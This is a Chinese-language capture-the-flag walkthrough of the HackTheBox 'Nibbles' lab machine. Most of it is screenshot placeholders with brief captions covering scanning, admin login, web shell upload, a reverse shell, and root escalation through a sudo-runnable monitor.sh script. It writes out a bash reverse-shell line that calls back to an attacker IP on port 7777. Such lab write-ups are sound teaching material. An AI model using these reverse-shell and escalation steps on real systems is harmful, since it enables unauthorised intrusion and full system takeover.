Nibbles - HackTheBox
Td

image

nmap扫描

image

image

访问80端口

image

查看页面源代码

image

发现一个目录

image

扫一波目录

image

发现一个管理员登录地址

image

没账号密码

发现版本信息,搜索一下

image

image

貌似可以写一个shell进去

image

先试试账号密码登录

image

写一个shell

image

image

拼接路径访问

image

image

文件存在,试试命令执行

image

反弹一个shell

image

用burp抓包

image

应该是要编码一下

image

image

image

看看有无可利用信息

image

image

在xxx目录下的monitor.sh文件,可无需密码利用root执行

image

没有这个目录

压缩包也没权限

image

手动创建一个目录

image

在攻击机上写一个,然后在下载到目标机器

1
2
#!/bin/bash
bash -i >& /dev/tcp/10.10.14.5/7777 0>&1

image

利用python开一个http服务

image

image

添加执行权限

image

利用sudo执行

image

image